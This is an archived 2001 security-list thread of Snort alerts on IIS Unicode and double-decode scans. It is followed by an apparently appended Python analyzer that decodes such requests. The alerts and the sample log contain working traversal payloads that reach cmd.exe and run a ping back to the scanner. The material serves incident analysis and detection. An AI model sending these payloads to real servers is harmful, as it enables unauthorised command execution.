I have been getting the same type of logs also, but from a different IP. Mainly from China. :-/ Yeah, go figure.

./0g

----- Original Message -----
From: "Jason Robertson" <jasonat_private>
To: <incidentsat_private>
Sent: Sunday, July 29, 2001 1:59 PM
Subject: Unusual IIS decode requests

>
> Hrm.. well I just received something today, well a few days ago.. I just got around to
> writing this up. (I must work too hard, doing this on a Sunday)
>
> Anyways, as it looks, this user was attempting to find IIS servers that were
> unpatched for the Unicode Bug. But what makes this one unusual is that,
> instead of the common winnt/cmd.exe /c dir c:, this user used
> winnt/cmd.exe /c ping -n 1 -l 128 -w 1, which I find pretty unusual.
>
> But it does seem to be a smart method of testing, as this does eliminate some of
> the overhead, in that the dir c: could time out, if and only if someone would put a large
> number of files in c:\, and to really be annoying put a large number of 0-byte files in
> C:\. This could give you a large number of files with a very low amount of wasted
> space (though it still is a waste of space because of the name, time, ACL entries),
> but what can you do.
>
>
>
> [**] WEB-IIS cmd.exe access [**]
> Jul 27,01 12:37:13pm 24.41.72.83:1712 -> 216.18.61.203:80
> TTL: 47 TOS: 0x224 ID:0
> ***AP**F Seq: 672966764 Ack: 2100864331 Win: 5840
>
> 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/..
> 25323535632E2E253235356377696E6E742F7379 %255c..%255cwinnt/sy
> 7374656D33322F636D642E6578653F2F632B7069 stem32/cmd.exe?/c+pi
> 6E672B2D6E2B312B2D6C2B3132382B2D772B312B ng+-n+1+-l+128+-w+1+
> 32342E34312E37322E383320485454502F312E30 24.41.72.83.HTTP/1.0
> 0A0A00003C85034038700140CF0700006ECD0040 ....<..@8p.@....n..@
> 20990408446A0140C04812401ECE00408C710140 ....Dj.@.H.@...@.q.@
> 987201402C99040801000000F28204086E431240 .r.@,...........nC.@
> 20990408446A0140C04812400100000060431240 ....Dj.@.H.@....`C.@
> 006B014010F6FFBFA185040820990408009A0408 .k.@................
>
> [**] WEB-IIS cmd.exe access [**]
> Jul 27,01 12:37:13pm 24.41.72.83:1714 -> 216.18.61.202:80
> TTL: 47 TOS: 0x0 ID:0
> ***AP**F Seq: 680331733 Ack: 2100928858 Win: 5840
>
> 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/..
> 25323535632E2E253235356377696E6E742F7379 %255c..%255cwinnt/sy
> 7374656D33322F636D642E6578653F2F632B7069 stem32/cmd.exe?/c+pi
> 6E672B2D6E2B312B2D6C2B3132382B2D772B312B ng+-n+1+-l+128+-w+1+
> 32342E34312E37322E383320485454502F312E30 24.41.72.83.HTTP/1.0
> 0A0A00003C85034038700140CF0700006ECD0040 ....<..@8p.@....n..@
> 20990408446A0140C04812401ECE00408C710140 ....Dj.@.H.@...@.q.@
> 987201402C99040801000000F28204086E431240 .r.@,...........nC.@
> 20990408446A0140C04812400100000060431240 ....Dj.@.H.@....`C.@
> 006B014010F6FFBFA185040820990408009A0408 .k.@................
>
> [**] WEB-IIS cmd.exe access [**]
> Jul 27,01 12:37:13pm 24.41.72.83:1715 -> 216.18.61.201:80
> TTL: 47 TOS: 0x0 ID:0
> ***AP**F Seq: 684366937 Ack: 2101034143 Win: 5840
>
> 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/..
> 25323535632E2E253235356377696E6E742F7379 %255c..%255cwinnt/sy
> 7374656D33322F636D642E6578653F2F632B7069 stem32/cmd.exe?/c+pi
> 6E672B2D6E2B312B2D6C2B3132382B2D772B312B ng+-n+1+-l+128+-w+1+
> 32342E34312E37322E383320485454502F312E30 24.41.72.83.HTTP/1.0
> 0A0A00003C85034038700140CF0700006ECD0040 ....<..@8p.@....n..@
> 20990408446A0140C04812401ECE00408C710140 ....Dj.@.H.@...@.q.@
> 987201402C99040801000000F28204086E431240 .r.@,...........nC.@
> 20990408446A0140C04812400100000060431240 ....Dj.@.H.@....`C.@
> 006B014010F6FFBFA185040820990408009A0408 .k.@................
>
> [**] WEB-IIS cmd.exe access [**]
> Jul 27,01 12:37:16pm 24.41.72.83:1711 -> 216.18.61.205:80
> TTL: 47 TOS: 0x0 ID:0
> ***AP**F Seq: 676101846 Ack: 2101820142 Win: 5840
>
> 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/..
> 25323535632E2E253235356377696E6E742F7379 %255c..%255cwinnt/sy
> 7374656D33322F636D642E6578653F2F632B7069 stem32/cmd.exe?/c+pi
> 6E672B2D6E2B312B2D6C2B3132382B2D772B312B ng+-n+1+-l+128+-w+1+
> 32342E34312E37322E383320485454502F312E30 24.41.72.83.HTTP/1.0
> 0A0A00003C85034038700140CF0700006ECD0040 ....<..@8p.@....n..@
> 20990408446A0140C04812401ECE00408C710140 ....Dj.@.H.@...@.q.@
> 987201402C99040801000000F28204086E431240 .r.@,...........nC.@
> 20990408446A0140C04812400100000060431240 ....Dj.@.H.@....`C.@
> 006B014010F6FFBFA185040820990408009A0408 .k.@................
>
> [**] WEB-IIS multiple decode attempt [**]
> Jul 27,01 12:37:22pm 24.41.72.83:1946 -> 216.18.61.205:80
> TTL: 47 TOS: 0x0 ID:0
> ***AP*** Seq: 676258451 Ack: 2106779224 Win: 5840
>
> 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/..
> 2535632E2E25356377696E6E742F73797374656D %5c..%5cwinnt/system
> 33322F636D642E6578653F2F632B70696E672B2D 32/cmd.exe?/c+ping+-
> 6E2B312B2D6C2B3132382B2D772B312B32342E34 n+1+-l+128+-w+1+24.4
> 312E37322E383320485454502F312E300A0A0000 1.72.83.HTTP/1.0....
> 3C85034038700140CF0700006ECD004020990408 <..@8p.@....n..@....
> 446A0140C04812401ECE00408C71014098720140 Dj.@.H.@...@.q.@.r.@
> 2C99040801000000F28204086E43124020990408 ,...........nC.@....
> 446A0140C04812400100000060431240006B0140 Dj.@.H.@....`C.@.k.@
> 10F6FFBFA185040820990408009A0408 ................
>
> [**] WEB-IIS cmd.exe access [**]
> Jul 27,01 12:37:25pm 24.41.72.83:1701 -> 216.18.61.216:80
> TTL: 47 TOS: 0x0 ID:0
> ***AP**F Seq: 672736508 Ack: 2100687070 Win: 5840
>
> 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/..
> 25323535632E2E253235356377696E6E742F7379 %255c..%255cwinnt/sy
> 7374656D33322F636D642E6578653F2F632B7069 stem32/cmd.exe?/c+pi
> 6E672B2D6E2B312B2D6C2B3132382B2D772B312B ng+-n+1+-l+128+-w+1+
> 32342E34312E37322E383320485454502F312E30 24.41.72.83.HTTP/1.0
> 0A0A00003C85034038700140CF0700006ECD0040 ....<..@8p.@....n..@
> 20990408446A0140C04812401ECE00408C710140 ....Dj.@.H.@...@.q.@
> 987201402C99040801000000F28204086E431240 .r.@,...........nC.@
> 20990408446A0140C04812400100000060431240 ....Dj.@.H.@....`C.@
> 006B014010F6FFBFA185040820990408009A0408 .k.@................
>
> [**] WEB-IIS cmd.exe access [**]
> Jul 27,01 12:37:28pm 24.41.72.83:2151 -> 216.18.61.207:80
> TTL: 47 TOS: 0x0 ID:0
> ***AP**F Seq: 690117489 Ack: 2106691395 Win: 5840
>
> 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/..
> 25323535632E2E253235356377696E6E742F7379 %255c..%255cwinnt/sy
> 7374656D33322F636D642E6578653F2F632B7069 stem32/cmd.exe?/c+pi
> 6E672B2D6E2B312B2D6C2B3132382B2D772B312B ng+-n+1+-l+128+-w+1+
> 32342E34312E37322E383320485454502F312E30 24.41.72.83.HTTP/1.0
> 0A0A00003C85034038700140CF0700006ECD0040 ....<..@8p.@....n..@
> 20990408446A0140C04812401ECE00408C710140 ....Dj.@.H.@...@.q.@
> 987201402C99040801000000F28204086E431240 .r.@,...........nC.@
> 20990408446A0140C04812400100000060431240 ....Dj.@.H.@....`C.@
> 006B014010F6FFBFA185040820990408009A0408 .k.@................
>
> [**] WEB-IIS multiple decode attempt [**]
> Jul 27,01 12:37:55pm 24.41.72.83:1709 -> 216.18.61.206:80
> TTL: 47 TOS: 0x0 ID:0
> ***AP*** Seq: 679791880 Ack: 2118977419 Win: 5840
>
> 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/..
> 2535632E2E25356377696E6E742F73797374656D %5c..%5cwinnt/system
> 33322F636D642E6578653F2F632B70696E672B2D 32/cmd.exe?/c+ping+-
> 6E2B312B2D6C2B3132382B2D772B312B32342E34 n+1+-l+128+-w+1+24.4
> 312E37322E383320485454502F312E300A0A0000 1.72.83.HTTP/1.0....
> 3C85034038700140CF0700006ECD004020990408 <..@8p.@....n..@....
> 446A0140C04812401ECE00408C71014098720140 Dj.@.H.@...@.q.@.r.@
> 2C99040801000000F28204086E43124020990408 ,...........nC.@....
> 446A0140C04812400100000060431240006B0140 Dj.@.H.@....`C.@.k.@
> 10F6FFBFA185040820990408009A0408 ................
>
> [**] WEB-IIS cmd.exe access [**]
> Jul 27,01 12:40:20pm 24.41.72.83:1843 -> 216.18.61.201:80
> TTL: 47 TOS: 0x0 ID:0
> ***AP**F Seq: 686495535 Ack: 2105591950 Win: 5840
>
> 3872014001474554202F736372697074732F2E2E 8r.@.GET./scripts/..
> 25323535632E2E253235356377696E6E742F7379 %255c..%255cwinnt/sy
> 7374656D33322F636D642E6578653F2F632B7069 stem32/cmd.exe?/c+pi
> 6E672B2D6E2B312B2D6C2B3132382B2D772B312B ng+-n+1+-l+128+-w+1+
> 32342E34312E37322E383320485454502F312E30 24.41.72.83.HTTP/1.0
> 0A0A00003C85034038700140CF0700006ECD0040 ....<..@8p.@....n..@
> 20990408446A0140C04812401ECE00408C710140 ....Dj.@.H.@...@.q.@
> 987201402C99040801000000F28204086E431240 .r.@,...........nC.@
> 20990408446A0140C04812400100000060431240 ....Dj.@.H.@....`C.@
> 006B014010F6FFBFA185040820990408009A0408 .k.@................
>
>
> ------- End of forwarded message -------
>
> ---
> Jason Robertson
> Network Analyst
> jasonat_private
> http://www.astroadvice.com
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
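As an added example (my own code, not from Jason's post or anything posted to the list), here is a small Python analyzer that decodes request lines the way the two Snort signatures above imply IIS did, and then says what each request actually reaches. It models the "multiple decode" problem as two percent-decode passes (a %255c path is harmless to a server that decodes once, since it stays %5c, and only becomes a backslash on a second pass), and it also folds the overlong-UTF-8 form of the Unicode bug (%c0%af for "/"), which the quoted alerts do not contain but the same scanner family used. It also picks up the trick Jason noticed: when the command is a ping whose target equals the packet's source address, the scanner is asking the victim to announce success over ICMP instead of waiting for dir output in the HTTP body. The log entries are constructed for this example: the first two re-type the request lines visible in the alerts, the rest are invented; the 10.0.0.x addresses and the report.asp path are placeholders.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample log entries (source IP, request line). The first two
# re-type the request lines visible in the quoted Snort alerts; the others are
# made up for this example so the same logic can be seen on other inputs.
SAMPLE_LOG = [
    ("24.41.72.83", "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe"
                    "?/c+ping+-n+1+-l+128+-w+1+24.41.72.83 HTTP/1.0"),
    ("24.41.72.83", "GET /scripts/..%5c..%5cwinnt/system32/cmd.exe"
                    "?/c+ping+-n+1+-l+128+-w+1+24.41.72.83 HTTP/1.0"),
    ("10.0.0.9", "GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.0"),
    ("10.0.0.9", "GET /scripts/report.asp?path=%255cshared HTTP/1.0"),
    ("10.0.0.10", "GET /index.html HTTP/1.0"),
]

IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def fold_overlong_utf8(data: bytes) -> bytes:
    """Map two-byte overlong UTF-8 sequences (lead byte 0xC0/0xC1) to the
    7-bit character they encode: b'\\xc0\\xaf' -> b'/', b'\\xc1\\x9c' -> b'\\\\'.
    A strict decoder rejects these; the original IIS Unicode bug accepted them."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def iis_style_decode(text: str, passes: int = 2) -> str:
    """Percent-decode `passes` times, folding overlong UTF-8 after each pass.
    passes=1 models a server that decodes once; passes=2 models the IIS
    double-decode bug, where %255c survives the first pass as %5c (harmless
    to a traversal check) and only becomes a backslash on the second."""
    data = text.encode("latin-1")
    for _ in range(passes):
        data = fold_overlong_utf8(unquote_to_bytes(data))
    return data.decode("latin-1")


def normalize_path(decoded: str):
    """Split a decoded path into segments, treating '\\' like '/', and report
    whether '..' climbed above the web root."""
    segs, escaped = [], False
    for seg in decoded.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segs:
                segs.pop()
            else:
                escaped = True
            continue
        segs.append(seg)
    return segs, escaped


def analyze_request(src_ip: str, request_line: str, passes: int = 2) -> dict:
    """Decode one request line the way IIS would and describe what it reaches.
    The result is a dict so the verdicts can be checked programmatically."""
    parts = request_line.split()
    method, target = parts[0], parts[1]
    path, _, query = target.partition("?")
    decoded = iis_style_decode(path, passes)
    segs, escaped = normalize_path(decoded)
    is_cmd = bool(segs) and segs[-1].lower() == "cmd.exe"
    # cmd.exe arguments ride in the query string with '+' standing for spaces.
    command = iis_style_decode(query, 1).replace("+", " ") if is_cmd else ""
    tokens = command.split()
    # The quoted scans ping the scanner's own address: an ICMP echo arriving
    # from the victim proves execution without waiting for 'dir' output in
    # the HTTP body. Flag a ping whose last argument is the packet's source.
    callback = ""
    if "ping" in [t.lower() for t in tokens[:2]] and IPV4.match(tokens[-1]):
        callback = tokens[-1]
    return {
        "src_ip": src_ip,
        "method": method,
        "raw_path": path,
        "decoded_path": decoded,
        "canonical": "/" + "/".join(segs),
        "traversal": escaped,
        "cmd_exe": is_cmd,
        "command": command,
        "callback": callback,
        "callback_to_source": callback == src_ip,
    }


def scan(log, passes: int = 2) -> list:
    """Return the analysis of every entry that escapes the web root or
    reaches cmd.exe after IIS-style decoding."""
    return [r for r in (analyze_request(ip, line, passes) for ip, line in log)
            if r["traversal"] or r["cmd_exe"]]


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(f'{r["src_ip"]:>12}  {r["raw_path"]}')
        print(f'{"":>12}  -> {r["canonical"]}  traversal={r["traversal"]} '
              f'cmd={r["cmd_exe"]} callback_to_source={r["callback_to_source"]}')
```

Running it with passes=2 resolves the %255c, %5c and %c0%af requests all to /winnt/system32/cmd.exe above the web root; with passes=1 the %255c request stays inside /scripts (canonical /scripts/..%5c..%5cwinnt/system32/cmd.exe), which is exactly why the "multiple decode" signature exists as a separate rule from "cmd.exe access". Note that the analyzer only says what the path decodes to, not whether a given server would reject it; the %5c form would be caught by a patched server's traversal check even though it resolves the same way here.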
This archive was generated by hypermail 2b30 : Mon Jul 30 2001 - 11:00:27 PDT